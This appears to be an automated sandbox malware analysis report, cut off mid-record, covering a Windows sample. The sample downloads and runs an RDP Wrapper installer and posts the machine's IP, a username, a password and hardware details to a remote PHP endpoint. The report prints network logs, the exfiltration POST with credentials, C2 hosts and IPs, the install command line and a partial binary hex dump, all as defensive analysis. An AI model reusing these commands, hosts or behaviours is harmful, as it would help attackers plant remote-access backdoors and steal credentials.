                                                                                                            Oct 2, 2024 08:55:00.445184946 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.445200920 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.445209026 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.445216894 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.445239067 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.445245981 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.445250988 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.445256948 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.445256948 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.445261955 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.445276022 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.445302963 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.445683956 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.445699930 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.445715904 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.445732117 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.445740938 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.445748091 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.445772886 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.445811987 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.445811987 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.446022987 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.446038008 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.446053028 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.446069956 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.446073055 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.446091890 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.446115971 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.446120977 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.446140051 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.446156025 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.446170092 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.446185112 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.446190119 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.446201086 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.446213961 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.446213961 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.446216106 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.446232080 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.446249008 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.446279049 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.446279049 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.447030067 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.447046041 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.447061062 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.447077036 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.447089911 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.447091103 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.447107077 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.447129011 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.447130919 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.447149038 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.447336912 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.447350979 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.447371006 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.447376013 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.447408915 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.447418928 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.447423935 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.447446108 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.447460890 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.447468996 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.447514057 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.447734118 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.447747946 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.447974920 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:37.974356890 CEST4970980192.168.2.7104.26.13.205
                                                                                                            Oct 2, 2024 08:55:37.987698078 CEST8049709104.26.13.205192.168.2.7
                                                                                                            Oct 2, 2024 08:55:37.987816095 CEST4970980192.168.2.7104.26.13.205
                                                                                                            Oct 2, 2024 08:55:37.987941027 CEST4970980192.168.2.7104.26.13.205
                                                                                                            Oct 2, 2024 08:55:37.993577003 CEST8049709104.26.13.205192.168.2.7
                                                                                                            Oct 2, 2024 08:55:38.493813992 CEST8049709104.26.13.205192.168.2.7
                                                                                                            Oct 2, 2024 08:55:38.497184038 CEST497103389192.168.2.78.46.123.33
                                                                                                            Oct 2, 2024 08:55:38.503236055 CEST3389497108.46.123.33192.168.2.7
                                                                                                            Oct 2, 2024 08:55:38.503333092 CEST497103389192.168.2.78.46.123.33
                                                                                                            Oct 2, 2024 08:55:38.503675938 CEST497103389192.168.2.78.46.123.33
                                                                                                            Oct 2, 2024 08:55:38.509138107 CEST4970980192.168.2.7104.26.13.205
                                                                                                            Oct 2, 2024 08:55:38.509598970 CEST3389497108.46.123.33192.168.2.7
                                                                                                            Oct 2, 2024 08:55:38.509677887 CEST497103389192.168.2.78.46.123.33
                                                                                                            Oct 2, 2024 08:55:38.514816046 CEST8049709104.26.13.205192.168.2.7
                                                                                                            Oct 2, 2024 08:55:38.634804964 CEST8049709104.26.13.205192.168.2.7
                                                                                                            Oct 2, 2024 08:55:38.682625055 CEST4970980192.168.2.7104.26.13.205
                                                                                                            Oct 2, 2024 08:55:38.798074961 CEST49711443192.168.2.7188.114.97.3
                                                                                                            Oct 2, 2024 08:55:38.798116922 CEST44349711188.114.97.3192.168.2.7
                                                                                                            Oct 2, 2024 08:55:38.798181057 CEST49711443192.168.2.7188.114.97.3
                                                                                                            Oct 2, 2024 08:55:38.840253115 CEST49711443192.168.2.7188.114.97.3
                                                                                                            Oct 2, 2024 08:55:38.840272903 CEST44349711188.114.97.3192.168.2.7
                                                                                                            Oct 2, 2024 08:55:39.370647907 CEST44349711188.114.97.3192.168.2.7
                                                                                                            Oct 2, 2024 08:55:39.370754004 CEST49711443192.168.2.7188.114.97.3
                                                                                                            Oct 2, 2024 08:55:39.374486923 CEST49711443192.168.2.7188.114.97.3
                                                                                                            Oct 2, 2024 08:55:39.374496937 CEST44349711188.114.97.3192.168.2.7
                                                                                                            Oct 2, 2024 08:55:39.374903917 CEST44349711188.114.97.3192.168.2.7
                                                                                                            Oct 2, 2024 08:55:39.416981936 CEST49711443192.168.2.7188.114.97.3
                                                                                                            Oct 2, 2024 08:55:39.417181015 CEST49711443192.168.2.7188.114.97.3
                                                                                                            Oct 2, 2024 08:55:39.459412098 CEST44349711188.114.97.3192.168.2.7
                                                                                                            Oct 2, 2024 08:55:39.517563105 CEST44349711188.114.97.3192.168.2.7
                                                                                                            Oct 2, 2024 08:55:39.517824888 CEST49711443192.168.2.7188.114.97.3
                                                                                                            Oct 2, 2024 08:55:39.517849922 CEST44349711188.114.97.3192.168.2.7
                                                                                                            Oct 2, 2024 08:55:40.021622896 CEST44349711188.114.97.3192.168.2.7
                                                                                                            Oct 2, 2024 08:55:40.021799088 CEST44349711188.114.97.3192.168.2.7
                                                                                                            Oct 2, 2024 08:55:40.021892071 CEST49711443192.168.2.7188.114.97.3
                                                                                                            Oct 2, 2024 08:55:40.025917053 CEST49711443192.168.2.7188.114.97.3
                                                                                                            Oct 2, 2024 08:55:40.041630030 CEST4970980192.168.2.7104.26.13.205
                                                                                                            Oct 2, 2024 08:55:40.041884899 CEST4970280192.168.2.7147.45.44.104

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Oct 2, 2024 08:55:37.950931072 CEST5263253192.168.2.71.1.1.1
                                                                                                            Oct 2, 2024 08:55:37.965933084 CEST53526321.1.1.1192.168.2.7
                                                                                                            Oct 2, 2024 08:55:38.753180027 CEST5912553192.168.2.71.1.1.1
                                                                                                            Oct 2, 2024 08:55:38.797389984 CEST53591251.1.1.1192.168.2.7

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Oct 2, 2024 08:55:37.950931072 CEST192.168.2.71.1.1.10x1d0aStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                            Oct 2, 2024 08:55:38.753180027 CEST192.168.2.71.1.1.10xc3dStandard query (0)hansgborn.euA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Oct 2, 2024 08:55:37.965933084 CEST1.1.1.1192.168.2.70x1d0aNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                            Oct 2, 2024 08:55:37.965933084 CEST1.1.1.1192.168.2.70x1d0aNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                            Oct 2, 2024 08:55:37.965933084 CEST1.1.1.1192.168.2.70x1d0aNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                            Oct 2, 2024 08:55:38.797389984 CEST1.1.1.1192.168.2.70xc3dNo error (0)hansgborn.eu188.114.97.3A (IP address)IN (0x0001)false
                                                                                                            Oct 2, 2024 08:55:38.797389984 CEST1.1.1.1192.168.2.70xc3dNo error (0)hansgborn.eu188.114.96.3A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • hansgborn.eu
                                                                                                            • 147.45.44.104
                                                                                                            • api.ipify.org

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.749702147.45.44.104807404C:\Users\user\Desktop\file.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 2, 2024 08:54:58.417622089 CEST94OUTGET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1
                                                                                                            Host: 147.45.44.104
                                                                                                            Connection: Keep-Alive
                                                                                                            Oct 2, 2024 08:54:59.037098885 CEST1236INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Wed, 02 Oct 2024 06:54:58 GMT
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Length: 1785344
                                                                                                            Last-Modified: Thu, 26 Sep 2024 12:36:03 GMT
                                                                                                            Connection: keep-alive
                                                                                                            Keep-Alive: timeout=120
                                                                                                            ETag: "66f55533-1b3e00"
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Accept-Ranges: bytes
                                                                                                            Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 [TRUNCATED]
                                                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7PEL#CZ4<7P@@`{^.text `.itext|0 `.dataxP8@.bssOpL.idataL@.tls`.rdata`@@.reloc^`b@B.rsrc{`|@@p@@
                                                                                                            Oct 2, 2024 08:54:59.037205935 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Data Ascii: @Boolean@FalseTrueSystem4@AnsiChar@P@Char@h@ShortInt@@SmallInt
                                                                                                            Oct 2, 2024 08:54:59.037216902 CEST1236INData Raw: 15 40 00 42 00 f4 ff b2 15 40 00 43 00 f4 ff f0 15 40 00 42 00 f4 ff 1f 16 40 00 42 00 f4 ff 48 16 40 00 43 00 f4 ff 7c 16 40 00 43 00 f4 ff b5 16 40 00 43 00 f4 ff e0 16 40 00 43 00 f4 ff 09 17 40 00 43 00 f4 ff 35 17 40 00 43 00 f4 ff 71 17 40
                                                                                                            Data Ascii: @B@C@B@BH@C|@C@C@C@C5@Cq@C@C@C-@Bg@B@B@C%@CV@C@J@J@J@Ju@J@J@J@JO@Kz@J@MTOb
                                                                                                            Oct 2, 2024 08:54:59.037537098 CEST672INData Raw: 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 33 00 70 53 40 00 08 55 6e 69 74 4e 61 6d 65 03 00 10 12 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 10 12 40 00 01 00 01 01 02 00 02 00 33 00 48 52 40 00 06 45 71 75 61 6c 73 03
                                                                                                            Data Ascii: Self3pS@UnitName@Self@@3HR@Equals@@Self@Obj+PR@GetHashCode@@Self38T@ToString@@Self@@[0T@SafeCallExceptionl@
                                                                                                            Oct 2, 2024 08:54:59.037606001 CEST1236INData Raw: 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 f8 1b 40 00 0f 0a 49 49 6e 74 65 72 66 61 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 8b c0 cc 83 44 24 04 f8 e9 b9 7b 00 00 83 44 24 04
                                                                                                            Data Ascii: System@IInterfaceFSystemD${D${D${)@3@=@FH@@T@@@@@@HR@PR@8T@0T@@@XT@LT@@@Q@|Q@@
                                                                                                            Oct 2, 2024 08:54:59.037617922 CEST1236INData Raw: 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 f8 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 e4 10 40 00 08 00 00 00
                                                                                                            Data Ascii: @VWord@VLongWord@VInt644@VUInt64@VString@VAny@VArray@VPointer@VUStringVLongsVWordsVBytesRawData
                                                                                                            Oct 2, 2024 08:54:59.037627935 CEST1236INData Raw: 30 8b c3 83 c4 44 5b c3 8d 40 00 ff 25 34 c4 44 00 8b c0 ff 25 30 c4 44 00 8b c0 ff 25 2c c4 44 00 8b c0 e4 04 01 00 ff ff ff ff 5a 00 00 00 46 61 73 74 4d 4d 20 42 6f 72 6c 61 6e 64 20 45 64 69 74 69 6f 6e 20 28 63 29 20 32 30 30 34 20 2d 20 32
                                                                                                            Data Ascii: 0D[@%4D%0D%,DZFastMM Borland Edition (c) 2004 - 2008 Pierre le Riche / Professional Software DevelopmentAn unexpected memory leak has occurred. The unexpected small block leaks are:The sizes of unexpec
                                                                                                            Oct 2, 2024 08:54:59.037637949 CEST1236INData Raw: e6 00 00 ff ff 6a 04 68 00 10 10 00 56 6a 00 e8 23 fb ff ff 8b d8 85 db 74 30 8b fb 89 6f 08 83 ce 04 89 77 0c e8 7d ff ff ff a1 cc 9a 44 00 c7 07 c8 9a 44 00 89 1d cc 9a 44 00 89 47 04 89 18 c6 05 c4 9a 44 00 00 83 c3 10 8b c3 5d 5f 5e 5b c3 8b
                                                                                                            Data Ascii: jhVj#t0ow}DDDGD]_^[SVWUC$PT$PuhjVt3?:3jD$PShjSut$;v+uD$$$T$PD$]_
                                                                                                            Oct 2, 2024 08:54:59.038366079 CEST328INData Raw: d3 e0 23 04 95 44 7a 44 00 74 0c 83 e1 e0 0f bc c0 09 c1 eb 5e 90 90 b8 fe ff ff ff 89 d1 d3 e0 23 05 40 7a 44 00 74 17 0f bc d0 8b 04 95 44 7a 44 00 0f bc c8 89 d0 c1 e0 05 09 c1 eb 35 90 8b 0d 3c 7a 44 00 29 d9 72 1a a1 38 7a 44 00 29 d8 a3 38
                                                                                                            Data Ascii: #DzDt^#@zDtDzD5<zD)r8zD)8zD<zDX4zD[VW<zDwFG89u!DzDu@zD#~)t3JHT0rd7KN4zD_^[[+1
                                                                                                            Oct 2, 2024 08:54:59.038383007 CEST1236INData Raw: 42 14 8b 4a 04 89 48 04 89 41 14 31 c0 39 53 10 75 03 89 43 0c 88 03 89 d0 8b 52 fc 8a 1d 4d 70 44 00 e9 85 00 00 00 b8 00 01 00 00 f0 0f b0 23 74 94 f3 90 80 3d d5 78 44 00 00 75 ea 51 52 6a 00 e8 e5 f4 ff ff 5a 59 b8 00 01 00 00 f0 0f b0 23 0f
                                                                                                            Data Ascii: BJHA19SuCRMpD#t=xDuQRjZY#oQRjZY%4zDtB=xDuj%4zDt!jVuD3L3u5L3Fu@tPCF\3Y4zD
                                                                                                            Oct 2, 2024 08:54:59.042196035 CEST1236INData Raw: 0a 04 00 73 12 f7 db d9 ee dd 14 13 83 c3 08 78 f8 89 0a dd c0 d9 f7 5b c3 8b c0 8b c8 8b d1 83 ea 04 8b 12 83 e2 f0 03 d1 8b c2 8b d0 83 ea 04 8b 12 83 e2 f0 85 d2 75 02 33 c0 c3 8d 40 00 83 3d 3c 7a 44 00 00 74 1a 8b 15 38 7a 44 00 3b d0 72 10
                                                                                                            Data Ascii: sx[u3@=<zDt8zD;r;8zDs=<zDt8zD3@SV ;BuZ;ZvB+^[BH^[WA_p0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.749709104.26.13.205807404C:\Users\user\Desktop\file.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 2, 2024 08:55:37.987941027 CEST63OUTGET / HTTP/1.1
                                                                                                            Host: api.ipify.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Oct 2, 2024 08:55:38.493813992 CEST227INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 02 Oct 2024 06:55:38 GMT
                                                                                                            Content-Type: text/plain
                                                                                                            Content-Length: 11
                                                                                                            Connection: keep-alive
                                                                                                            Vary: Origin
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8cc2c9b938024368-EWR
                                                                                                            Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                            Data Ascii: 8.46.123.33
                                                                                                            Oct 2, 2024 08:55:38.509138107 CEST39OUTGET / HTTP/1.1
                                                                                                            Host: api.ipify.org
                                                                                                            Oct 2, 2024 08:55:38.634804964 CEST227INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 02 Oct 2024 06:55:38 GMT
                                                                                                            Content-Type: text/plain
                                                                                                            Content-Length: 11
                                                                                                            Connection: keep-alive
                                                                                                            Vary: Origin
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8cc2c9ba088c4368-EWR
                                                                                                            Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                            Data Ascii: 8.46.123.33


                                                                                                            HTTPS Proxied Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.749711188.114.97.34437404C:\Users\user\Desktop\file.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-10-02 06:55:39 UTC171OUTPOST /core/receive.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Host: hansgborn.eu
                                                                                                            Content-Length: 185
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-10-02 06:55:39 UTC25INHTTP/1.1 100 Continue
                                                                                                            2024-10-02 06:55:39 UTC185OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 75 73 65 72 3d 50 61 6e 73 79 42 69 6e 73 26 70 61 73 73 77 6f 72 64 3d 57 65 6c 54 57 34 48 6e 61 4b 74 33 26 6f 73 5f 6e 61 6d 65 3d 57 69 6e 64 6f 77 73 2b 31 30 2b 50 72 6f 26 70 72 6f 63 65 73 73 6f 72 3d 49 6e 74 65 6c 28 52 29 2b 43 6f 72 65 28 54 4d 29 32 2b 43 50 55 2b 36 36 30 30 2b 25 34 30 2b 32 2e 34 30 2b 47 48 7a 26 63 6f 72 65 73 3d 34 26 67 70 75 3d 4d 39 42 34 5f 46 52 26 67 70 75 5f 6d 65 6d 6f 72 79 3d 31 30 32 34 26 72 61 6d 3d 34 30 39 35 26 64 69 73 6b 5f 73 70 61 63 65 3d 33 38 33
                                                                                                            Data Ascii: ip=8.46.123.33&user=PansyBins&password=WelTW4HnaKt3&os_name=Windows+10+Pro&processor=Intel(R)+Core(TM)2+CPU+6600+%40+2.40+GHz&cores=4&gpu=M9B4_FR&gpu_memory=1024&ram=4095&disk_space=383
                                                                                                            2024-10-02 06:55:40 UTC601INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 02 Oct 2024 06:55:39 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F2D2S04sSbam0vp1jV%2F3XGo28XuQKiFnyovubs%2FxrHKBmDwj3D3Tp44eceldwaI95AohMLsfllXj8OmEmEieTAscO1ZO4UhS4zX2Nsm1dHbMrrmTkXjvP6NVWWGBN%2BY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8cc2c9bfbab87cb2-EWR
                                                                                                            0


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:1
                                                                                                            Start time:02:54:56
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                            Imagebase:0x6d0000
                                                                                                            File size:946'176 bytes
                                                                                                            MD5 hash:6CEB22AEB317C27CF8A0944EC9634D40
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000000.1376199757.00000000006D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:2
                                                                                                            Start time:02:54:59
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                                                                                                            Imagebase:0x410000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:3
                                                                                                            Start time:02:54:59
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:02:54:59
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                                                                                                            Imagebase:0x400000
                                                                                                            File size:1'785'344 bytes
                                                                                                            MD5 hash:C213162C86BB943BCDF91B3DF381D2F6
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:Borland Delphi
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.1400805486.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000004.00000000.1400872744.0000000000450000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 68%, ReversingLabs
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:8
                                                                                                            Start time:02:55:01
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\netsh.exe
